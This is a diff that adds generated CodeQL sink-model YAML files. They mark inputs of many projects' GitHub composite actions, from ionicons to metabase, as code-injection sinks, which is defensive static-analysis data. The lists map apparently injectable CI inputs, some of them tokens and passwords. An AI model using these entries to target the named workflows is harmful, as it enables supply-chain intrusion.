@@ -0,0 +1,14 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ionic-team/ionicons", "*", "inputs.paths", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.output", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.totalShards", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.shard", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.folder", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.tag", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.version", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.filename", "code-injection", "generated"] + - ["ionic-team/ionicons", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml new file mode 100644 index 000000000000..1d30610cfd12 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ionic-team/stencil", "*", "inputs.paths", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.output", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.tag", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.version", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.filename", "code-injection", "generated"] + - ["ionic-team/stencil", "*", "inputs.path", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml new file mode 100644 index 000000000000..867dc33f4321 --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ipfs/aegir", "*", "inputs.browser", "code-injection", "generated"] + - ["ipfs/aegir", "*", "inputs.docker-username", "code-injection", "generated"] + - ["ipfs/aegir", "*", "inputs.docker-token", "code-injection", "generated"] + - ["ipfs/aegir", "*", "inputs.build", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml new file mode 100644 index 000000000000..87b014cbdd62 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jetbrains/jetbrainsruntime", "*", "inputs.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml new file mode 100644 index 000000000000..6dd3ac94306a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml 
@@ -0,0 +1,22 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jhipster/generator-jhipster", "*", "inputs.generator-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.application-packaging", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.application-environment", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jdl-entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.entities-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.application-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jdl-sample", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-branch", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.jhipster-bom-repository", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.package-with-executable", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.generator-jhipster-directory", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.application-path", "code-injection", "generated"] + - ["jhipster/generator-jhipster", "*", "inputs.extra-args", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml new file mode 100644 index 000000000000..f952bd1da93c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jsocol/django-ratelimit", "*", "inputs.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml new file mode 100644 index 000000000000..977662bfa655 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["juicedata/juicefs", "*", "inputs.compress", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.storage", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.meta", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.name", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.mysql_password", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.file_test_mode", "code-injection", "generated"] + - ["juicedata/juicefs", "*", "inputs.file_total_size", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml new file mode 100644 index 000000000000..4c6c92fdefda --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["jupyter/docker-stacks", "*", "inputs.variant", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "inputs.image", "code-injection", "generated"] + - ["jupyter/docker-stacks", "*", "inputs.platform", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml new file mode 100644 index 000000000000..45c2c1d780a9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["keycloak/keycloak", "*", "inputs.job-name", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "inputs.jobs", "code-injection", "generated"] + - ["keycloak/keycloak", "*", "inputs.version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml new file mode 100644 index 000000000000..1edfbfc94328 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kserve/kserve", "*", "inputs.directory", "code-injection", "generated"] + - ["kserve/kserve", "*", "inputs.deployment-mode", "code-injection", "generated"] + - ["kserve/kserve", "*", "inputs.network-layer", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml new file mode 100644 index 000000000000..658283336bd7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml 
@@ -0,0 +1,10 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubeflow/katib", "*", "inputs.experiments", "code-injection", "generated"] + - ["kubeflow/katib", "*", "inputs.database-type", "code-injection", "generated"] + - ["kubeflow/katib", "*", "inputs.training-operator", "code-injection", "generated"] + - ["kubeflow/katib", "*", "inputs.katib-ui", "code-injection", "generated"] + - ["kubeflow/katib", "*", "inputs.trial-images", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml new file mode 100644 index 000000000000..d00b30874cce --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubeflow/training-operator", "*", "inputs.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml new file mode 100644 index 000000000000..94ece1a58a0e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubernetes-sigs/karpenter", "*", "inputs.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml new file mode 100644 index 000000000000..46d5a4383f44 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml 
@@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubernetes-sigs/kwok", "*", "inputs.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml new file mode 100644 index 000000000000..5627a31bd904 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubescape/kubescape", "*", "inputs.ORIGINAL_TAG", "code-injection", "generated"] + - ["kubescape/kubescape", "*", "inputs.SUB_STRING", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml new file mode 100644 index 000000000000..98d2d8bcbf7f --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kubeshop/botkube", "*", "inputs.username", "code-injection", "generated"] + - ["kubeshop/botkube", "*", "inputs.access_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml new file mode 100644 index 000000000000..57fb2e710642 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["kyverno/kyverno", "*", "inputs.version", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "inputs.sbom-name", "code-injection", "generated"] + - ["kyverno/kyverno", "*", "inputs.makefile-target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml new file mode 100644 index 000000000000..8a216b97e1e3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lancedb/lance", "*", "inputs.repo", "code-injection", "generated"] + - ["lancedb/lance", "*", "inputs.vcpkg_token", "code-injection", "generated"] + - ["lancedb/lance", "*", "inputs.part", "code-injection", "generated"] + - ["lancedb/lance", "*", "inputs.arm-build", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml new file mode 100644 index 000000000000..735413808ec8 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["launchdarkly/ios-client-sdk", "*", "inputs.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml new file mode 100644 index 000000000000..54334359d0e9 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml 
@@ -0,0 +1,11 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["layer5labs/meshmap-snapshot", "*", "inputs.assetLocation", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.mesheryToken", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.application_url", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.prNumber", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.designID", "code-injection", "generated"] + - ["layer5labs/meshmap-snapshot", "*", "inputs.application_type", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml new file mode 100644 index 000000000000..67826ea9c0f8 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -0,0 +1,15 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ldc-developers/ldc", "*", "inputs.cmake_flags", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.build_targets", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.host_dc", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.llvm_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.build_dir", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.arch", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.os", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.cross_target_triple", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.ios_deployment_target", "code-injection", "generated"] + - ["ldc-developers/ldc", "*", "inputs.cross_compiling", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml new file mode 100644 index 000000000000..d05404147023 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["ledgerhq/ledger-live", "*", "inputs.os", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "inputs.turborepo-server-port", "code-injection", "generated"] + - ["ledgerhq/ledger-live", "*", "inputs.turbo-server-token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml new file mode 100644 index 000000000000..9020a979bbb0 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lerna/lerna", "*", "inputs.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml new file mode 100644 index 000000000000..91c84fda1d18 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lf-edge/eve", "*", "inputs.command", "code-injection", "generated"] + - ["lf-edge/eve", "*", "inputs.dockerhub-account", "code-injection", "generated"] + - ["lf-edge/eve", "*", "inputs.dockerhub-token", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml new file mode 100644 index 000000000000..5031ff1e4ca5 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -0,0 +1,12 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["libgit2/libgit2", "*", "inputs.command", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.container-version", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.container", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.base", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.config-path", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.registry", "code-injection", "generated"] + - ["libgit2/libgit2", "*", "inputs.dockerfile", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml new file mode 100644 index 000000000000..fc3a7ebe253b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml 
@@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lightning-ai/pytorch-lightning", "*", "inputs.name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-folder", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.pip-flags", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-extra", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.pkg-name", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.nb-dirs", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.wheel-dir", "code-injection", "generated"] + - ["lightning-ai/pytorch-lightning", "*", "inputs.torch-url", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml new file mode 100644 index 000000000000..b7a664d512f3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["lightning-ai/torchmetrics", "*", "inputs.pypi-dir", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "inputs.torch-url", "code-injection", "generated"] + - ["lightning-ai/torchmetrics", "*", "inputs.pytorch-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml new file mode 100644 index 000000000000..234f13b73871 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml 
@@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["linkerd/linkerd2", "*", "inputs.component", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "inputs.docker-registry", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-username", "code-injection", "generated"] + - ["linkerd/linkerd2", "*", "inputs.docker-ghcr-pat", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml new file mode 100644 index 000000000000..164ba02c42bf --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -0,0 +1,9 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["logseq/publish-spa", "*", "inputs.accent-color", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "inputs.theme-mode", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "inputs.graph-directory", "code-injection", "generated"] + - ["logseq/publish-spa", "*", "inputs.output-directory", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml new file mode 100644 index 000000000000..17fb61eeeb1b --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -0,0 +1,7 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["macvim-dev/macvim", "*", "inputs.contents", "code-injection", "generated"] + - ["macvim-dev/macvim", "*", "inputs.formula", "code-injection", "generated"] \ No newline at end of file 
diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml new file mode 100644 index 000000000000..8513c7da64d3 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mamba-org/mamba", "*", "inputs.key_suffix", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "inputs.key_base", "code-injection", "generated"] + - ["mamba-org/mamba", "*", "inputs.key_prefix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml new file mode 100644 index 000000000000..a4ab8f025d07 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml 
@@ -0,0 +1,16 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["maplibre/maplibre-native", "*", "inputs.artifact-name", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.externalData", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testSpecArn", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testFilter", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.AWS_DEVICE_FARM_DEVICE_POOL_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.AWS_DEVICE_FARM_PROJECT_ARN", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testFile", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.appFile", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.testPackageType", "code-injection", "generated"] + - ["maplibre/maplibre-native", "*", "inputs.appType", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml new file mode 100644 index 000000000000..7d82b2d3e9e7 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -0,0 +1,6 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mastodon/mastodon", "*", "inputs.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml new file mode 100644 index 000000000000..e466e17ddb41 --- /dev/null 
+++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mavlink/qgroundcontrol", "*", "inputs.aws_secret_access_key", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "inputs.aws_key_id", "code-injection", "generated"] + - ["mavlink/qgroundcontrol", "*", "inputs.artifact_name", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml new file mode 100644 index 000000000000..53881157a232 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -0,0 +1,13 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["mdanalysis/mdanalysis", "*", "inputs.extra-pip-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.full-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.micromamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.mamba", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.extra-conda-deps", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.isolation", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.build-docs", "code-injection", "generated"] + - ["mdanalysis/mdanalysis", "*", "inputs.build-tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml new file mode 100644 index 000000000000..5ee6e863db68 --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml 
@@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["medic/cht-core", "*", "inputs.hostname", "code-injection", "generated"] + - ["medic/cht-core", "*", "inputs.password", "code-injection", "generated"] + - ["medic/cht-core", "*", "inputs.username", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml new file mode 100644 index 000000000000..3f5a3b658c3e --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["medusajs/medusa", "*", "inputs.pathToSeedData", "code-injection", "generated"] + - ["medusajs/medusa", "*", "inputs.password", "code-injection", "generated"] + - ["medusajs/medusa", "*", "inputs.email", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml new file mode 100644 index 000000000000..f5c13431126c --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml 
@@ -0,0 +1,17 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["metabase/metabase", "*", "inputs.organization_name", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.github_token", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.username", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.test-args", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.clojure-version", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.include-log", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.message", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.mysql", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.postgres", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.openldap", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.maildev", "code-injection", "generated"] + - ["metabase/metabase", "*", "inputs.edition", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml new file mode 100644 index 000000000000..4788f44e856a --- /dev/null +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -0,0 +1,8 @@ +extensions: + - addsTo: + pack: githubsecuritylab/actions-all + extensible: sinkModel + data: + - ["metamask/action-create-release-pr", "*", "inputs.artifacts-path", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "inputs.created-pr-status", "code-injection", "generated"] + - ["metamask/action-create-release-pr", "*", "inputs.release-branch-prefix", "code-injection", "generated"] \ No newline at end of file 
